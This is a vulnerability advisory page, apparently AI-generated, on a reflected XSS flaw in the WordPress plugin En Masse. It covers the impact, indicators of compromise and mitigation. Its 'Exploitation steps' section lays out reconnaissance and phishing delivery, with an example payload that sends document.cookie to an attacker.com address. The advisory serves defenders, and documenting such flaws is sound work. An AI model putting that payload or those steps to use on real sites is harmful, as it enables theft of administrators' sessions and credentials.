CVE-2025-23707
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-23707 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress plugin "En Masse" (en-masse-wp) developed by Matamko. It affects all versions up to and including 1.0, with no official patch currently available. The vulnerability was reported on October 30, 2024, by researcher João Pedro S Alcântara (Kinorth) and published by Patchstack on March 19, 2025, with the CVE formally assigned on December 31, 2025. It carries a CVSS v3.1 base score of 7.1 (High), assigned by Patchstack (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. User-supplied input is not properly sanitized or encoded before being reflected back in the web page response, allowing an attacker to inject arbitrary JavaScript or HTML. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a privileged user must click a crafted malicious link or visit a specially crafted page. The vulnerability falls under OWASP Top 10 category A3: Injection (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute malicious scripts (JavaScript, HTML redirects, advertisements, or other payloads) in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, affecting other components such as the victim's browser environment (Patchstack).

Exploitability

No evidence of active in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.033%, indicating a low probability of exploitation in the near term. However, Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of their traffic or popularity. No public PoC exploit code has been identified (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the En Masse plugin (version ≤ 1.0) using tools like WPScan, Shodan, or Google dorks targeting the plugin's known file paths.
  2. Identify vulnerable parameter: Locate the plugin's page or endpoint that reflects unsanitized user input back in the HTTP response.
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, e.g., https://target-site.com/?vulnerable_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver payload: Send the crafted URL to a privileged WordPress user (e.g., administrator) via phishing email, social engineering, or embedded link.
  5. Achieve objective: When the victim clicks the link and their browser loads the page, the injected script executes in their browser context, enabling session cookie theft, credential harvesting, or unauthorized administrative actions (Patchstack).

Indicators of compromise

  • Network: HTTP requests to WordPress pages with URL-encoded script tags or JavaScript event handlers (e.g., <script>, onerror=, onload=) in query parameters; outbound requests from victim browsers to unknown external domains shortly after visiting the WordPress site.
  • Logs: Web server access logs showing GET/POST requests with XSS payloads in query strings targeting En Masse plugin endpoints; unusual referrer headers in server logs indicating crafted link delivery.
  • Browser/Session: Unexpected session cookie exfiltration or admin account actions not initiated by the legitimate user; new admin accounts or plugin/theme changes made without administrator knowledge.

Mitigation and workarounds

As of the time of publication, no official patch has been released by the plugin developer Matamko for the En Masse plugin. Patchstack has issued a virtual patching/mitigation rule for its subscribers to block exploitation attempts until an official fix is available. Site administrators are advised to deactivate and remove the En Masse plugin immediately if it is not essential, or contact their hosting provider for assistance. Monitoring web application firewall (WAF) rules for reflected XSS patterns targeting the plugin is also recommended (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78570CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78568CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78572HIGH8.1
  • kalles-addons
NoNoAug 25, 2026
CVE-2026-78576HIGH7.5
  • readabler
NoYesAug 25, 2026
CVE-2026-76128MEDIUM6.4
  • ecommerce-product-catalog
NoYesAug 25, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management